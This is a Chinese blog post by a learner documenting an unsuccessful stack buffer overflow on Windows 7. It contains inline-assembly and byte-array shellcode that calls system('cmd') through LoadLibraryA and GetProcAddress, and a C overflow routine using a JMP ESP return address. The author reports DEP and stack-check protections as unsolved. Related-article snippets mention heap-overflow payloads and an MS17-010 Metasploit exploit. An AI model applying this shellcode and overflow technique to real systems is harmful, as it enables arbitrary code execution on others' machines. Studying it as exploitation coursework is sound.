win7 下不成功的一次堆栈漏洞溢出

最新推荐文章于 2024-08-12 22:02:01 发布
最新推荐文章于 2024-08-12 22:02:01 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dasgk/article/details/11788193
版权
本文详细解析了shellcode技术的应用,包括如何利用LoadLibraryA和GetProcAddress获取系统函数地址,实现系统调用,并通过内存操作压入堆栈参数。讨论了遇到的挑战如DEP保护和RTC检查栈函数,提供了解决方案并展示了最终的shellcode实现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先,我使用的是JMP ESP的跳转到shellcode,在本次开机的时候获得LoadLibraryA,GetProcAddress,当然在win7下kernel32.dll的地址是随机的,但一旦开机,就已经固

定,只是重启后变得不再相同,本次使用的是LoadLibraryA的地址是0x75a0dc55,getProcAddress的地址是:x75a0cc84h,我们需要获得的是system函数的地址,同时,

将"cmd"压入堆栈,获得一个cmd程序的使用权,shellcode如下

_asm{

mov eax,0x75a0dc55
push 0;
push 0x6c6c642e
push 0x30303172;'r100'
push 0x6376736d;'cvsm'
push esp;
call eax;LoadLibraryA
mov ecx,eax;
mov eax,75a0cc84h;
push 0;
push 6d65h
push 74737973h;
push esp;
push ecx;
call eax;
push 0;
push 0x646d63;
push esp;
call eax

}经过转换之后是:



#include <windows.h>  
#include<iostream>
#include <stdio.h> 
using namespace std;
//这里面LoadLibraryA的地址是0x75a0dc55,GetProcAddress的地址是75a0cc84h,少一句mov eax,0x75a0dc55
byte p[]={0xB8,0X55,0XDC,0XA0,0X75,0x6A,0x00,0x68,0x2E,0x64,0x6C,0x6C,0x68,0x72,0x31,0x30,0x30,0x68,0x6D,0x73,0x76,0x63,0x54,0xFF,0xD0,0x8B,0xC8,0xB8,0x84,0xCC,0xA0,0x75,
0x6A,0x00,0x68,0x65,0x6D,0x00,0x00,0x68,0x73,0x79,0x73,0x74,0x54,0x51,0xFF,0xD0,0x6A,0x00,0x68,0x63,0x6D,0x64,0x00,0x54,0xFF,0xD0};
int main()  
{  

char buf[16]={0};
memset(buf,0x90,20);//填充数据完成
//memset(buf+28,0x77330bbb,4);//写入JMP ESP的地址
memcpy(buf+28,"\xbb\x0b\x33\x77",4);
memcpy(buf+32,p,sizeof(p));
//每次执行完都有一个_RTC_CheckStackVar,函数对堆栈进行检测,另外还有DEP(数据执行保护,默认不执行数据段和堆栈段的数据)

}

经过测试,压入堆栈的三个参数(没有实参)第一个参数是返回地址,第二个参数是ebp,第三个参数是:security_cookie,之后才是局部变量,本实例采用NRS模式,首先填

充NOP,绕过EBP和security_cookie,直接向ret 赋值(我们已知 JMP ESP是0x7733bbb)但是还有两个问题没有解决,一个是DEP,数据执行保护,默认情况下不允许执行堆栈

和数据段中的数据,该选项可以在连接器-高级中找到,第二个是在用户代码执行完毕之后有一个函数会检测堆栈,_RTC_CheckStackVar该函数到底执行了什么,暂时未知,

好了,突破了这两点,堆栈溢出就能成功,今天先写到这里了。

Windows 平台下的堆溢出、格式化字符串漏洞利用技术
04-09
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
总结windows下堆溢出的三种利用方式(1)
要饭's Blog
06-28 2121
main (int argc, char *argv[]) { char *buf1, *buf2; char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/x03/x00/x05/x00/x00/x01/x08/x00/x11/x11/x11/x11/x21/x21/x21/x21"; buf1 = (char*)malloc (32); /* 分配两块内存
Windows平台下的堆溢出利用技术(二)(上篇)
weixin_33704234的博客
03-08 1264
lxj616 · 2014/05/06 16:270x00 背景开头我讨论了在旧版本Windows下利用堆溢出的技术,试着给读者提供一些关于unlink过程是怎样执行的、以及freelist[n]里面的flink/blink是如何被攻击者控制并提供简单的任意“4字节写”操作 的 实用的知识。本文的主要目的是重新提醒自己(我很健忘)并且帮助安全专家获取对老版本windows(NT v5 及以下)堆管...
动手实验 CVE-2012-0003 Microsoft Windows Media Player winmm.dll MIDI文件堆溢出(坑多)
abelxu
02-19 3776
动手实践CVE-2012-0003堆溢出,坑很多。尽力寻找堆块大小发生改变的底层原理。
windows堆溢出总结
weixin_30808253的博客
02-28 435
1. <<w00w00 on Heap Overflows>> 一文总结 未完待续.... 转载于:https://www.cnblogs.com/freesec/p/6480654.html
Win32缓冲区溢出实战.7z
10-19
Win32缓冲区溢出实战》是一本深入探讨计算机安全领域中重要概念的书籍,主要聚焦于Windows 32位系统中的缓冲区溢出漏洞利用技术。缓冲区溢出是编程中的一个常见错误,当程序尝试写入超过分配内存空间的数据时,就...
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告
m0_64973256的博客
01-20 1042
.简介 软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:攻击者需要获取内网访问权或本地访问权 身份认证:漏洞利用无需身份认证 二.软件介绍 Adobe Rea...
【逆向】栈溢出漏洞学习过程(一)通过字符串验证的简单程序分析
lanlanla的成长历程
01-08 3466
目录 前言: 1 准备程序 PS:翻车现场: 2 分析程序执行流程(栈溢出原理) 2.1 看代码中忘记的知识补充一下: 2.1.1 主函数中涉及的寄存器相关知识: 2.1.2 涉及到的指令 地址传送指令LEA PTR REP STOS int 3中断 段超越指令前缀 2.2 main函数中的初始化部分 2.3 scanf()函数部分 2.4 函数verify_pas...
二进制菜鸟之栈溢出漏洞利用思路
Blood_Pupil的博客
08-06 1040
作为一只二进制菜鸟,,应该是作为一只各安全领域的菜鸟,感觉二进制学的还是蛮开心的,每天也都能学到点新的东西,调试代码的过程也是非常令人开心。今天总结下目前学到的栈溢出漏洞的利用思路 栈溢出漏洞简介 我们知道C语言中有些字符串操作函数会对字符串的长度进行检查,比如strcpy。 #include<stdio.h> #include<string.h> char nam...
缓冲区溢出攻击示例
最新发布
qq_67812668的博客
08-12 1233
缓冲区溢出攻击是利用 缓冲区溢出漏洞 所进行的攻击行动。 缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛 存在 。 利用缓冲区溢出攻击,可以导致程序 运行 失败、系统关机、重新启动等后果。 缓冲区 溢出是指当 计算机 向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。 理想的情况是:程序会检查数据长度,而且并允许输入超过缓冲区长度的字符。 但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。
windows下的堆栈溢出利用技术.
01-15
windows平台下的堆栈溢出利用技术,比较错的一篇文章。
ms17-010 攻击win7漏洞复现
weixin_30920091的博客
03-14 443
只是为了好玩重新写一篇。利用还是很简单的。 将下载下来的rb放置在:/usr/share/metasploit-framework/modules/exploits/windows/smb/ 目录下 可以先用模块扫描一遍判断一些那些存在漏洞然后再攻击。 msf > use exploit/windows/smb/ms17_010_eternalbluemsf exploit(...
《0day》-5-堆溢出
Starr
05-11 1820
第 5 章 堆溢出利用 文章目录第 5 章 堆溢出利用5.1 堆的工作原理5.1.1 Windows 堆的历史5.1.2 堆与栈的区别5.1.3 堆的数据结构与管理策略堆块堆表空表快表堆的管理策略堆块分配堆块释放堆块合并小结5.2 在堆中漫游5.2.1 堆分配函数之间的调用关系5.2.2 堆的调试方法5.2.3 识别堆表5.2.4 ...
最新远程溢出漏洞
jahn的专栏
10-28 1286
#!/usr/bin/perl## *# * C@@@@@ O@@@@@@@ C@@@@@ O@@@@@@O C@@@@@@@@@o # * C@@@@@@@@@@@@@@@@O
缓存区溢出攻击实验(1)
PTkin的博客
03-24 5250
缓存区溢出攻击实验(1)本实验预计分 3 个小实验来做,本文是第一个实验。
0815 - 堆栈溢出
weixin_33782386的博客
08-15 717
这次搞 CloudKit + Core Data,真的已经持续太长时间了,心里堆栈已快溢出… 总算,两台手机间核心的同步差多搞定了。明天再搞搞外围的,比如订阅推送之类的。 坚持,这个搞定了,一定大肆庆祝下。 博客原文:0815 - 堆栈溢出...
动态内存管理——tlsf
qq_43441284的博客
11-23 1325
TLSF(全称Two-Level Segregated Fit)
Windows内存漏洞——栈溢出漏洞及其利用分析
theglasssky的博客
05-25 945
windows系统中内存漏洞中关于栈溢出的部分
esp-idf的内存管理——tlsf算法
gzxb1995的博客
05-16 4269
目录1 最初还是tlsf2 为什么要引入tlsf3 idf中使用的tlsf算法的设计与实现4 源码走读参考 1 最初还是tlsf 2 为什么要引入tlsf 3 idf中使用的tlsf算法的设计与实现 4 源码走读 参考 [1] 半文钱的博客 [2] upstream所在的github地址 注意事项放到内存调试去说: 用户需要关注的: 内存的硬件特性(caps) 内存的访问速度 内存是否支持原子操作 内存是否可以由CPU直接访问 用户在使用时: 用户自己也要对自己的应用需要使用的内存做一些安排,有的内存比
Win32 War-FTPd漏洞实战:堆栈溢出剖析与利用教程
3. **确定攻击向量**:通过分析堆栈帧,识别溢出导致的控制流转移,确定可以利用的漏洞模式,如返回地址指针被覆盖、EIP寄存器被修改等。 4. **编写exploit**:利用编程语言(如C/C++或汇编)构造攻击payload,设计...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

世纪殇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值